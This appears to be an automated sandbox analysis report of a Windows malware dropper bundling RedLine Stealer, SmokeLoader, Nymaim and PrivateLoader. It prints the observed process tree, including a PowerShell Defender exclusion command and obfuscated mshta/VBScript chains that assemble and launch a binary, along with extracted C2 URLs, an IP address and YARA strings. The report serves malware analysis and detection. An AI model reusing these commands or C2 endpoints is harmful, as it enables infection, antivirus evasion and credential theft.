Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe

Overview

General Information

Sample name:abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
Analysis ID:1496480
MD5:efa310ffcb46aa3768de9aae3a8fdcda
SHA1:fc57edeadc23e53610eb75881fc7d2cecc847387
SHA256:abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb6bd2120da1c01fb1a5a
Tags:exeRedLineStealer
Infos:

Detection

CryptOne, Nymaim, PrivateLoader, RedLine, SmokeLoader, onlyLogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara Genericmalware
Yara detected CryptOne packer
Yara detected Nymaim
Yara detected PrivateLoader
Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected onlyLogger
Submitted sample is a known malware sample
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to steal Chrome passwords or cookies
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Opens the same file many times (likely Sandbox evasion)
PE file contains section with special chars
PE file has a writeable .text section
PE file has nameless sections
Performs DNS queries to domains with low reputation
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Potentially Suspicious Rundll32 Activity
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Wscript Shell Run In CommandLine
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe" MD5: EFA310FFCB46AA3768DE9AAE3A8FDCDA)
    • setup_installer.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Local\Temp\setup_installer.exe" MD5: 264FBE02A8ACAE2BA9A5144F8B947AAE)
      • setup_install.exe (PID: 7700 cmdline: "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe" MD5: 33D05F6171D18F49EDD9C5B1BC5B8C72)
        • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7752 cmdline: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • powershell.exe (PID: 7760 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • WmiPrvSE.exe (PID: 4364 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 7816 cmdline: C:\Windows\system32\cmd.exe /c Mon17742f90b916675f2.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 7828 cmdline: C:\Windows\system32\cmd.exe /c Mon17eac6d534bfd22c7.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon17eac6d534bfd22c7.exe (PID: 7892 cmdline: Mon17eac6d534bfd22c7.exe MD5: 5721981400FAF8EDB9CB2FA1E71404A2)
            • Mon17eac6d534bfd22c7.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe MD5: 5721981400FAF8EDB9CB2FA1E71404A2)
        • cmd.exe (PID: 7840 cmdline: C:\Windows\system32\cmd.exe /c Mon17c604381c7047e.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 7848 cmdline: C:\Windows\system32\cmd.exe /c Mon17e1fac3fd3d84b.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon17e1fac3fd3d84b.exe (PID: 7956 cmdline: Mon17e1fac3fd3d84b.exe MD5: 7C6B2DC2C253C2A6A3708605737AA9AE)
            • mshta.exe (PID: 5448 cmdline: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ) MD5: 06B02D5C097C7DB1F109749C45F3F505)
              • cmd.exe (PID: 2316 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • 09xU.exE (PID: 396 cmdline: 9xU.EXE -pPtzyIkqLZoCarb5ew MD5: 7C6B2DC2C253C2A6A3708605737AA9AE)
                  • mshta.exe (PID: 8132 cmdline: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ) MD5: 06B02D5C097C7DB1F109749C45F3F505)
                    • cmd.exe (PID: 7284 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                      • conhost.exe (PID: 2740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • mshta.exe (PID: 2844 cmdline: "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) ) MD5: 06B02D5C097C7DB1F109749C45F3F505)
                    • cmd.exe (PID: 7808 cmdline: "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                      • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • cmd.exe (PID: 2676 cmdline: C:\Windows\system32\cmd.exe /S /D /c" eCHO " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                      • cmd.exe (PID: 1352 cmdline: C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                      • control.exe (PID: 1196 cmdline: control .\R6f7sE.I MD5: EBC29AA32C57A54018089CFC9CACAFE8)
                        • rundll32.exe (PID: 7852 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I MD5: 889B99C52A60DD49227C5E485A016679)
                • taskkill.exe (PID: 7712 cmdline: taskkill /F -Im "Mon17e1fac3fd3d84b.exe" MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • cmd.exe (PID: 7856 cmdline: C:\Windows\system32\cmd.exe /c Mon17b5f403be4d8d6b.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 7864 cmdline: C:\Windows\system32\cmd.exe /c Mon17f45359eb9.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon17f45359eb9.exe (PID: 8036 cmdline: Mon17f45359eb9.exe MD5: BE60D71B303F2AAE5618315147C7D3F9)
            • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmd.exe (PID: 7876 cmdline: C:\Windows\system32\cmd.exe /c Mon1785436ae78.exe /mixone MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon1785436ae78.exe (PID: 8076 cmdline: Mon1785436ae78.exe /mixone MD5: 0FC8BA6DE4099DDC991EADE9B86A6F06)
            • WerFault.exe (PID: 8112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 864 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 8124 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 872 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 3120 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 900 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 2316 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 1064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • cmd.exe (PID: 7884 cmdline: C:\Windows\system32\cmd.exe /c Mon17948100733a95c58.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon17948100733a95c58.exe (PID: 8056 cmdline: Mon17948100733a95c58.exe MD5: B6B87E674629A0F112CB1283B0322CCB)
            • Mon17948100733a95c58.exe (PID: 4544 cmdline: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe MD5: B6B87E674629A0F112CB1283B0322CCB)
              • WerFault.exe (PID: 7588 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • cmd.exe (PID: 7900 cmdline: C:\Windows\system32\cmd.exe /c Mon179e1058f256.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon179e1058f256.exe (PID: 8164 cmdline: Mon179e1058f256.exe MD5: ECC773623762E2E326D7683A9758491B)
        • cmd.exe (PID: 7912 cmdline: C:\Windows\system32\cmd.exe /c Mon1795d04d4bd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon1795d04d4bd.exe (PID: 8136 cmdline: Mon1795d04d4bd.exe MD5: D082843D4E999EA9BBF4D89EE0DC1886)
        • cmd.exe (PID: 7920 cmdline: C:\Windows\system32\cmd.exe /c Mon178817e243.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Mon178817e243.exe (PID: 7972 cmdline: Mon178817e243.exe MD5: C213A2444632FFDF0425E0288BCA48B9)
        • WerFault.exe (PID: 7320 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 980 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7596 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
NymaimNymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim
NameDescriptionAttributionBlogpost URLsLink
PrivateLoaderAccording to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2020, "C2 list": ["http://lecanardstsornin.com/upload/", "http://m3600.com/upload/", "http://camasirx.com/upload/"]}
{"C2 url": "135.181.129.119:4805", "Bot Id": "she", "Authorization Header": "b69102cdbd4afe2d3159f88fb6dac731"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
    • 0xbc2:$s1: Runner
    • 0xc54:$s2: DownloadPayload
    • 0xc64:$s3: RunOnStartup
    • 0xbd6:$a1: Antis
    • 0xc03:$a2: antiVM
    • 0xc0a:$a3: antiSandbox
    • 0xc16:$a4: antiDebug
    • 0xc20:$a5: antiEmulator
    • 0xc2d:$a6: enablePersistence
    • 0xc3f:$a7: enableFakeError
    • 0xc7f:$a8: DetectVirtualMachine
    • 0xca4:$a9: DetectSandboxie
    • 0xccf:$a10: DetectDebugger
    • 0xcde:$a11: CheckEmulator
    C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurlpp.dllMALWARE_Win_DLInjector03Detects unknown loader / injectorditekSHen
    • 0xccf9:$x1: LOADER ERROR
    • 0x5f53:$s1: _ZN6curlpp10OptionBaseC2E10CURLoption
    • 0xcd06:$s2: The procedure entry point %s could not be located in the dynamic link library %s
    C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exeJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
      C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeJoeSecurity_Generic_malwareYara Generic_malwareJoe Security
        SourceRuleDescriptionAuthorStrings
        00000018.00000002.1990631383.0000000001700000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        0000001D.00000002.4154666399.000000000184F000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x1250:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
          0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_onlyLoggerYara detected onlyLoggerJoe Security
            0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
            • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
            Click to see the 77 entries
            SourceRuleDescriptionAuthorStrings
            1.3.setup_installer.exe.31a1c46.7.raw.unpackJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
              29.2.Mon179e1058f256.exe.5c50000.8.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                29.2.Mon179e1058f256.exe.5c50000.8.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  29.2.Mon179e1058f256.exe.5c50000.8.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x13c51:$a4: get_ScannedWallets
                  • 0x13739:$a5: get_ScanTelegram
                  • 0x1380d:$a6: get_ScanGeckoBrowsersPaths
                  • 0x13960:$a7: <Processes>k__BackingField
                  • 0x12b8f:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0x1355a:$a9: <ScanFTP>k__BackingField
                  29.2.Mon179e1058f256.exe.5c50000.8.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x13500:$u7: RunPE
                  • 0x13506:$u8: DownloadAndEx
                  • 0x1b042:$pat14: , CommandLine:
                  • 0x12aa3:$v2_1: ListOfProcesses
                  • 0x136a5:$v2_2: get_ScanBrowsers
                  • 0x136e3:$v2_2: get_ScanFTP
                  • 0x136fb:$v2_2: get_ScanWallets
                  • 0x1371b:$v2_2: get_ScanScreen
                  • 0x13739:$v2_2: get_ScanTelegram
                  • 0x1375b:$v2_2: get_ScanVPN
                  • 0x13773:$v2_2: get_ScanSteam
                  • 0x1378f:$v2_2: get_ScanDiscord
                  • 0x137d5:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1380d:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x13c51:$v2_2: get_ScannedWallets
                  • 0x12de4:$v2_3: GetArguments
                  • 0x12fc9:$v2_4: VerifyUpdate
                  • 0x12df1:$v2_5: VerifyScanRequest
                  • 0x12fbe:$v2_6: GetUpdates
                  • 0x18e30:$v2_6: GetUpdates
                  • 0x10eb1:$v4_3: base64str
                  Click to see the 158 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), CommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: Mon17e1fac3fd3d84b.exe, ParentImage: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe, ParentProcessId: 7956, ParentProcessName: Mon17e1fac3fd3d84b.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), ProcessId: 5448, ProcessName: mshta.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, ParentProcessId: 7700, ParentProcessName: setup_install.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", ProcessId: 7752, ProcessName: cmd.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), CommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: Mon17e1fac3fd3d84b.exe, ParentImage: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe, ParentProcessId: 7956, ParentProcessName: Mon17e1fac3fd3d84b.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), ProcessId: 5448, ProcessName: mshta.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU" , CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5448, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU" , ProcessId: 2316, ProcessName: cmd.exe
